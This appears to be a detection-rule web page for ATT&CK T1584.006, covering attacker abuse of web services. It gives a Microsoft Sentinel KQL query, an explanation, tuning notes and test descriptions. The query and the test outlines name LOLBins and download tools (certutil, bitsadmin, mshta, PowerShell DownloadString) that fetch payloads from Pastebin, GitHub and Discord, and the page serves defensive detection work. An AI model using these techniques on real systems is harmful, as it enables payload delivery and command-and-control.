T1584.006 Microsoft Sentinel · KQL

Detect Web Services in Microsoft Sentinel

Adversaries may compromise access to third-party web services to use as infrastructure during cyber operations. Popular platforms such as GitHub, WordPress, Google Drive, Dropbox, Discord, and SendGrid are targeted because they offer high availability, trusted domain reputations, and blend into legitimate organizational traffic. Compromised web service accounts are leveraged for command and control (C2) via dead-drop resolvers, payload hosting, data exfiltration staging, and phishing campaign infrastructure. Real-world examples include Turla using compromised WordPress sites for C2, Earth Lusca abusing Google Drive repositories, Gootloader inserting malicious scripts into CMS installations, and Winter Vivern hosting malicious payloads on compromised WordPress instances. Detection pivots to observable network behavior: suspicious processes making connections to web service API domains, scripting engines or LOLBins fetching content from anonymous paste sites, and non-browser processes accessing WordPress-specific URL paths on external domains.

MITRE ATT&CK

Tactic
Resource Development
Technique
T1584 Compromise Infrastructure
Sub-technique
T1584.006 Web Services
Canonical reference
https://attack.mitre.org/techniques/T1584/006/

KQL Detection Query

Microsoft Sentinel (KQL)
kusto 
let WebServiceDomains = dynamic([
    "github.com", "githubusercontent.com", "githubusercontents.com",
    "pastebin.com", "paste.ee", "pastecode.io", "hastebin.com",
    "dropbox.com", "dropboxusercontent.com",
    "googleapis.com", "drive.google.com", "docs.google.com",
    "discord.com", "discordapp.com",
    "sendgrid.net", "sendgrid.com",
    "hooks.slack.com",
    "notion.so"
]);
let SuspiciousCallers = dynamic([
    "powershell.exe", "pwsh.exe", "cmd.exe",
    "wscript.exe", "cscript.exe", "mshta.exe",
    "regsvr32.exe", "rundll32.exe", "msbuild.exe",
    "certutil.exe", "bitsadmin.exe",
    "curl.exe", "wget.exe"
]);
DeviceNetworkEvents
| where Timestamp > ago(24h)
| where RemoteUrl has_any (WebServiceDomains)
| where InitiatingProcessFileName in~ (SuspiciousCallers)
| extend ProcessCategory = case(
    InitiatingProcessFileName in~ ("powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"), "ScriptingEngine",
    InitiatingProcessFileName in~ ("mshta.exe", "regsvr32.exe", "rundll32.exe", "msbuild.exe"), "LOLBin",
    InitiatingProcessFileName in~ ("certutil.exe", "bitsadmin.exe", "curl.exe", "wget.exe"), "DownloadUtility",
    "Other"
)
| extend HighRiskParent = InitiatingProcessParentFileName in~ (
    "outlook.exe", "winword.exe", "excel.exe", "powerpnt.exe",
    "onenote.exe", "mspub.exe", "acrord32.exe", "chrome.exe", "msedge.exe", "firefox.exe"
)
| extend WordPressPath = RemoteUrl has_any ("/wp-content/uploads/", "/wp-includes/", "/xmlrpc.php")
| project Timestamp, DeviceName, AccountName,
         InitiatingProcessFileName, InitiatingProcessCommandLine,
         RemoteUrl, RemoteIP, RemotePort,
         InitiatingProcessParentFileName, InitiatingProcessParentCommandLine,
         ProcessCategory, HighRiskParent, WordPressPath
| sort by Timestamp desc
medium severity medium confidence

Detects suspicious processes making outbound network connections to web service domains commonly abused for C2 payload hosting, dead-drop resolvers, and exfiltration staging. Monitors scripting engines (PowerShell, WScript, CScript), LOLBins (mshta, regsvr32, rundll32, msbuild), and download utilities (certutil, bitsadmin, curl, wget) connecting to GitHub, Pastebin, Google Drive, Dropbox, Discord, and similar platforms. Flags HighRiskParent when the calling process was spawned by an Office application or browser (phishing delivery indicator) and WordPressPath when the URL contains WordPress-specific directory patterns indicating a compromised CMS being used to serve payloads.

Data Sources

Network Traffic: Network Connection CreationMicrosoft Defender for Endpoint

Required Tables

DeviceNetworkEvents

False Positives & Tuning

  • Developer workstations where git.exe, the GitHub CLI (gh.exe), or IDE tools legitimately invoke curl.exe or PowerShell to call GitHub APIs for source code operations
  • IT automation scripts using curl.exe or PowerShell Invoke-WebRequest to download software packages or configuration files from authorized cloud storage (Dropbox, Google Drive)
  • Backup agents with known process names connecting to Dropbox or Google Drive APIs as part of data protection workflows
  • CI/CD pipeline agents running as Windows services that use PowerShell or curl to interact with GitHub repositories for deployment operations
  • Security tooling (threat intelligence platforms, SOAR connectors) that periodically calls external APIs to fetch threat feeds or submit samples
Download portable Sigma rule (.yml)

Other platforms for T1584.006

Splunk (SPL) Elastic Security (Elastic) IBM QRadar (QRadar) Sumo Logic CSE (Sumo) Google Chronicle (YARA-L) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1PowerShell Dead-Drop Resolver via GitHub Raw Content

    Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, CommandLine containing 'raw.githubusercontent.com' and 'DownloadString'. Sysmon Event ID 3: Network Connection from powershell.exe to raw.githubusercontent.com on port 443. Sysmon Event ID 22: DNS query for raw.githubusercontent.com. PowerShell ScriptBlock Log Event ID 4104: full script content including the URL.

  2. Test 2Certutil LOLBin Download from Pastebin

    Expected signal: Sysmon Event ID 1: Process Create with Image=certutil.exe, CommandLine containing '-urlcache', '-split', '-f', and 'pastebin.com'. Sysmon Event ID 3: Network Connection from certutil.exe to pastebin.com on port 443. Sysmon Event ID 11: File Create event for the output file in %TEMP%.

  3. Test 3cURL Payload Retrieval from Discord CDN

    Expected signal: Sysmon Event ID 1: Process Create with Image=curl.exe, CommandLine containing 'discord.com' and '-o'. Sysmon Event ID 3: Network Connection from curl.exe to discord.com on port 443. Sysmon Event ID 11: File Create event for the output file in %TEMP%.

  4. Test 4WScript Accessing Compromised Web Service via JScript

    Expected signal: Sysmon Event ID 1 (first): Process Create for powershell.exe creating the JS file. Sysmon Event ID 11: File Create for %TEMP%\df00tech_wstest.js. Sysmon Event ID 1 (second): Process Create for wscript.exe executing the JS file. Sysmon Event ID 3: Network Connection from wscript.exe to api.github.com on port 443. Sysmon Event ID 22: DNS query for api.github.com from wscript.exe.

Last updated: 2026-03-13 Research depth: deep
References (7)

Unlock Pro Content

Get the full detection package for T1584.006 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Parent Technique

T1584Compromise Infrastructure

Related Sub-techniques

T1584.001Compromise Infrastructure: DomainsT1584.002DNS ServerT1584.003Virtual Private ServerT1584.004Compromise Infrastructure: ServerT1584.005BotnetT1584.007ServerlessT1584.008Network Devices

Related Techniques

T1584Compromise InfrastructureT1102Web ServiceT1102.001Dead Drop ResolverT1102.002Bidirectional CommunicationT1567Exfiltration Over Web ServiceT1567.002Exfiltration to Cloud StorageT1566.002Spearphishing LinkT1059.001PowerShellT1583.006Web ServicesT1027.001Binary PaddingT1027.010Command Obfuscation

Same Tactic: Resource Development

Popular Detections